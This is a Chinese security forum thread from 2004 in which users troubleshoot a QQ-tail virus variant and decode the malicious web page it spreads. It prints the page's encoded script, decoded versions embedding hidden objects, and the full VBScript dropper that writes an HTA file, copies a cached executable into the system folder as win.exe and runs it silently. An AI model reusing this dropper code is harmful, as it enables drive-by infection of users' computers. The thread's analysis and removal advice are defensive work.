|
 | 作者: anpow [anpow]
 论坛用户 |
登录 |
| QQ尾巴,会自动发送一个这样的网址“http://qiumei.3322.org/zhaopian/me.jpg ”,什么杀毒软件都开不了,注册表也打不开。在线杀毒的网页也开不了。能解决的就来,请喝酒! |
| 地主 发表时间: 04-02-23 18:02 |
 | 回复: flylight_0 [flylight_0]  论坛用户 |
登录 |
|
我的 也是这个问题 连任务管理器也开不了 网页链接中只要有关病毒杀毒的就点不开 文件夹只要有病毒两个字也打不开 改了名立刻打开! 注册表打不开 好邪门的毒啊 请大家解决一下 谢谢! |
| B1层 发表时间: 04-02-23 22:33 |
 | 回复: jacky [jackypan] 论坛用户 |
登录 |
|
你们把注册表的文件名改一下,就可以打开了,再在注册表里去除注册项就好了 如还有问题,发邮件我 jackypan1984@126.com 我再看看 [此贴被 jacky(jackypan) 在 02月24日11时30分 编辑过] |
| B2层 发表时间: 04-02-24 11:29 |
 | 回复: ghost619 [ghost619]  论坛用户 |
登录 |
学习一下 |
| B3层 发表时间: 04-02-24 16:20 |
 | 回复: bridex [bridex]  论坛用户 |
登录 |
|
用我的签名呀,流行病毒专杀工具。 一?我的签名,怎么安全站点广告了? 开个玩笑的。来这里www.google.com里 在收索栏里打 流行病毒专杀工具 找到后下载到机子里,然后运行它。 开始查毒,查杀后自动修复IE设置! |
| B4层 发表时间: 04-02-24 16:42 |
| 回复: bridex [bridex] 论坛用户 |
登录 |
http://www.spant.net/
http://freesoft.nease.net/spant/softs/Spant.exe  |
| B5层 发表时间: 04-02-25 08:28 |
| 回复: ghame [ghame] 论坛用户 |
登录 |
|
我把这个网站的原码打出来,对解密我不在行,希望对网页加密熟的把它翻译过来。 <script language="JScript.Encode">#@~^xQEAAA==@#@&@!Z O@#@&\mD,AWMNdP{JYf;tYss]22]Z9Y!z]2Z8W[zu&3]Z9]ZbYf;W4%n1YY Z[mYCu&G] yhbUEa/ lkwY+y] ZA+botDYffZ]y!Ak[O4]ffu+!Z]f3u&Z&G(LnmDY22YZfu!bu&;r:T]+!kD^Y2f:H Lao]23Y!G]ZbY&/G(LnmDY ZNCOm]&9Yy 4+^sKRCkwu u ZA+bo4Yu&9Tu !SrNDt]29Y Z!u&3]f/JW8L^Yu&3YZf]T)u&/z(G9XY22u!fu!zY&;z4YsVYfAJPJ&w!YPHG;D,mMk2YG~1W[+,OtDn@#@&0EU^DkGx,G!YAKD9`#@#@&P@#@&7l.P +AAKDNkI@#@&x+SAGD9/,'~EUnkmCwchKD[d*i@#@&[Km;:UDRAMkD+` +SAWMNd#p@#@&N,@#@&K;YSWD9cbi@#@&Jz~OR@*@#@&Qn4AAA==^#~@</script> |
| B6层 发表时间: 04-02-25 21:16 |
 | 回复: jing_1460 [jing_1460] 论坛用户 |
登录 |
我把注册表的文件名改了但是还是不行啊,根本打不开 求助~~~ |
| B7层 发表时间: 04-02-26 13:39 |
| 回复: flylight_0 [flylight_0] 论坛用户 |
登录 |
|
再顶一下 大家加油啊 怎么能让这种东西横行 |
| B8层 发表时间: 04-02-26 19:41 |
 | 回复: xiaohe616 [xiaohe616]  论坛用户 |
登录 |
|
解密后是这样的: 一次解密: ============================================== <script language="JScript.Encode"> <!-- var words ="%3Chtml%3E%0D%0A%3Cbody%3E%0D%0A%3Cobject%20data%3D%22winups.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3Cimg%20src%3Dmy.jpg%3E%0D%0A%3Cobject%20data%3D%22hello.asp%22%20weight%3D0%20width%3D%200%3E%3C/object%3E%0D%0A%3C/body%3E%0D%0A%3C/html%3E" //put your cripto code there function outword() { var -ewwords; newwords = unescape(words); document.write(-ewwords); } outword(); // --> </script> =============================================== 二次解密: <script language="JScript.Encode"> <!-- var words ="<html> <body> <object data="winups.asp" weight=0 width= 0></object> <img src=my.jpg> <object data="hello.asp" weight=0 width= 0></object> </body> </html>" //put your cripto code there function outword() { var -ewwords; newwords = unescape(words); document.write(-ewwords); } outword(); // --> </script> [此贴被 小克(xiaohe616) 在 02月26日23时11分 编辑过] |
| B9层 发表时间: 04-02-26 23:06 |
 | 回复: 0045 [guang0701]  论坛用户 |
登录 |
到3721做下IE修复,挺方便的。 |
| B10层 发表时间: 04-02-27 09:31 |
 | 回复: cnyx [cnyx] 论坛用户 |
登录 |
|
该网页用了两次不同的加密算法,解密后的源代码如下: var words ="<html> <body> <object data="winups.asp" weight=0 width= 0></object> <img src=my.jpg> <object data="hello.asp" weight=0 width= 0></object> </body> </html>" //put your cripto code there function outword() { var -ewwords; newwords = unescape(words); document.write(-ewwords); } outword(); // --> </script> 希望大家一起学习,交朋友的加我QQ:4800135 |
| B11层 发表时间: 04-02-27 14:07 |
 | 回复: piaoling [piaoling] 论坛用户 |
登录 |
|
没试过网上的尾巴专杀工具吗? 试试吧? 也许会有用。 |
| B12层 发表时间: 04-02-27 20:58 |
| 回复: cxmcxm [cxmcxm] 论坛用户 |
登录 |
|
我也种了这个毒,你们说的都没用,除了上面所说的还有就是一切杀毒工具都打不开,在线杀毒的网站也一样! |
| B13层 发表时间: 04-02-27 21:17 |
| 回复: jing_1460 [jing_1460] 论坛用户 |
登录 |
|
我重做系统 都无法做,提示无法复制什么某文件啊 ,~!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! 现在什么办法都没有用 qq专杀都打不开啊 ~ |
| B14层 发表时间: 04-02-27 22:57 |
| 回复: cxmcxm [cxmcxm] 论坛用户 |
登录 |
我也是,在我能力范围内什么方法都用了也杀不了这个毒,我们一起顶到老大面前,老大出来帮帮忙呀!~~~~~~ |
| B15层 发表时间: 04-02-27 23:29 |
| 回复: ghame [ghame] 论坛用户 |
登录 |
|
下面这里是网页中的hello.asp的源代码,VBSCRIPT的,里面提到在TEMP文件夹中搜索“winups”字样,如果找到,将它复制到你的系统文件夹中。你们先查一下本机中的winups有关文件,看有没有什么发现。网页源代码中的winups.asp和my.jpg在我截获的HTTP包头中都是JPG类型,我正在研究。 <object id='wsh' classid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object> <HTA:APPLICATION caption="no" border="none" visiable="no" windowState="minimize" > <script LaNGUAGE="VBScript"> window.moveTo -100,-100 Set g_fs = CreateObject("Scripting.FileSystemObject") Set tf = g_fs.CreateTextFile("c:\isp.hta",true) tf.write "<HTA:APPLICATION caption=" & CHR(34)& "no" & CHR(34)& " border=" & CHR(34)& "none" & CHR(34)& " visiable=" & CHR(34)& "no" & CHR(34)& " showintaskbar=" & CHR(34)& "no" & CHR(34)& " >" &chr(13)&chr(10) tf.write "<object id='wsh' cl"& chr(97)&"ssid='clsid:F935DC22-1CF0-11D0-ADB9-00C04FD58A0B'></object>"&chr(13)&chr(10) tf.write "<" & "script LANGUAGE=" & CHR(34)& "VBScript" & CHR(34)& ">"&chr(13)&chr(10) tf.write "on error resume next"&chr(13)&chr(10) tf.write "window.moveTo -100,-100"&chr(13)&chr(10) tf.write "window.resizeTo 0,0 "&chr(13)&chr(10) tf.write "dim exepath"&chr(13)&chr(10) tf.write "Function Search(objFolder) "&chr(13)&chr(10) tf.write "Dim objSubFolder"&chr(13)&chr(10) tf.write "For Each objFile in objFolder.Files"&chr(13)&chr(10) tf.write "If InStr(1, objfile.name, " & CHR(34)& "winups" & CHR(34)& ", vbtextcompare) then"&chr(13)&chr(10) tf.write "set filecp = objg_fso.getfile(objfile.path)"&chr(13)&chr(10) tf.write "filecp.copy (exepath)"&chr(13)&chr(10) tf.write "exit for"&chr(13)&chr(10) tf.write "End If"&chr(13)&chr(10) tf.write "Next "&chr(13)&chr(10) tf.write "For Each objSubFolder in objFolder.SubFolders "&chr(13)&chr(10) tf.write "Search objSubFolder"&chr(13)&chr(10) tf.write "Next"&chr(13)&chr(10) tf.write "End Function"&chr(13)&chr(10) tf.write "Set objg_fso = CreateObject(" & CHR(34)& "Scripting.FileSystemObject" & CHR(34)& ")"&chr(13)&chr(10) tf.write "str=WSH.regread(" & CHR(34)& "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\cache" & CHR(34)& ")"&chr(13)&chr(10) tf.write "set tempfolder = objg_fso.getfolder(str)"&chr(13)&chr(10) tf.write "set othisfolder = objg_fso.GetSpecialFolder(1)" &chr(13)&chr(10) tf.write "exepath=othisfolder.path & "& chr(34) & "\win.exe" & chr(34) &chr(13)&chr(10) tf.write "search tempfolder"&chr(13)&chr(10) tf.write "wsh.run (exepath)"&chr(13)&chr(10) tf.write "wsh.run " & CHR(34)& "command.com /c del c:\isp.hta" & CHR(34)& " ,0"&chr(13)&chr(10) tf.write "window.close()"&chr(13)&chr(10) tf.write "<" &chr(47)& "script>"&chr(13)&chr(10) tf.close wsh.run "c:\isp.hta",0 window.close () </script> |
| B16层 发表时间: 04-02-28 08:59 |
| 回复: ghame [ghame] 论坛用户 |
登录 |
|
我基本知道病毒的原理了,就是利用伪装成ASP文件的winups.exe来监控系统运行的进程,如果有REGEDIT.EXE,之类的就将它结束。 解决方法: 下载一个不出名的进程查看软件,杀掉这个进程。 我这里介绍一个DOS进程查看程序。 http://www.cnhonker.com/download/tools/Other/tools.rar 里面也有注册表修改的。 |
| B17层 发表时间: 04-02-28 09:35 |
| 回复: ghame [ghame] 论坛用户 |
登录 |
|
忘了说了,winups.exe被复制到系统文件夹改名为win.exe,所以要杀的进程名应该是win.exe才对。 |
| B18层 发表时间: 04-02-28 09:46 |
 | 回复: shihaiyun [shihaiyun] 论坛用户 |
登录 |
|
我机子也是这样了,什么杀毒网页都打不开 杀毒工具都用不上啦 [此贴被 歌舞剧(shihaiyun) 在 02月28日13时39分 编辑过] |
| B19层 发表时间: 04-02-28 13:37 |
| 回复: cxmcxm [cxmcxm] 论坛用户 |
登录 |
呵呵,我终于把这个毒杀了,在C:\WINDOWS\system32下一个名叫(mz~~.exe).mz后面的~~~表示我忘了的英文字母,抱歉我这人很键忘!在安全模式下把它干掉就一切OK了! |
| B20层 发表时间: 04-02-28 14:05 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: QQ尾巴病毒的变种,请高手!